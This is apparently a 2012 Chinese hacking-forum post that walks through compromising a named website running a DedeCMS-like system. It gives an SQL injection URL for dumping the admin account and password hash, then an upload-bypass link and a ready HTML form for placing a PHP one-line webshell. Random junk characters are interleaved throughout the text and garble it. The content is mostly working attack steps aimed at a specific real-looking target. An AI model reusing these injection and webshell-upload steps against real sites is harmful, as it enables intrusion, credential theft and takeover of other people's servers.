①注入漏洞。
) [4 P5 `/ {: v这站 http://www.political-security.com/$ M0 n/ @, H8 l; x6 u( I: H- y4 A
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,* M' n4 H* `+ r: D8 J) I% {# {
www.political-security.com/data/mysql_error_trace.inc 爆后台/ F- R3 G8 g2 q! l2 Z
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
3 e: K! c7 S$ I1 n然后写上语句
' a$ R+ O& N. x: Q; H查看管理员帐号. N" `$ O' W- @5 P0 U
http://www.political-security.co ... &membergroup=@`
. G' y0 D( W7 @+ K" j/ d; n* B' V+ I& Z/ V2 p2 f1 n
admin 4 n' L: ?3 ?8 e5 n7 ~$ \. [2 J
# C6 O# R F$ g查看管理员密码
9 B0 k7 J1 b E6 d. n& S1 g http://www.political-security.co ... &membergroup=@`
$ A2 g6 N5 g% k+ `& M- q
: o$ G- \* V9 {$ l3 ~& P8d29b1ef9f8c5a5af4298 [9 W4 J0 i. L/ C; m) l+ P
5 J4 \& M# q5 S/ U8 M
查看管理员密码
/ U, ?$ s! O' k8 B: g7 o5 m. i( C9 \8 v# Q" \4 W
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5' j! f, i4 Z0 I) F4 h
! E% J. |+ E9 k8d20 ]7 G- a7 E9 t* W6 O
9b1ef9f8c5a5af426 s2 S" I0 q% ]) ~
9
9 J$ i3 F# I) ~- y8 Y" A: s( N% p2 Q; i# W# w# }
cmd5没解出来 只好测试第二个方法
' c9 L! d4 y0 l+ [& k m- |% L. l! m' i, F( ]9 L5 L; V
# j# e6 t" ^7 a$ H: V# J②上传漏洞:, h5 I* j5 e0 r5 u7 b' V7 p) M8 z- i
3 c6 W3 Q8 w4 s9 K. O+ V6 i8 \+ s只要登陆会员中心,然后访问页面链接6 l% a) a; W9 o6 J
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
' ~; A. t9 w; E/ }# N: i! s2 G3 k1 k% E$ z9 ] o7 y0 b; T
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
* R% H2 |8 A! M4 Y5 ]. W; D3 Q" M7 k# y( b( y/ Q6 g
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
. o$ D, P) H, l4 a" D7 [2 Q, l8 l4 z2 P h
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
( V2 Z- c/ a5 O0 U; _或者
' g! W- c. y0 ^% }即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对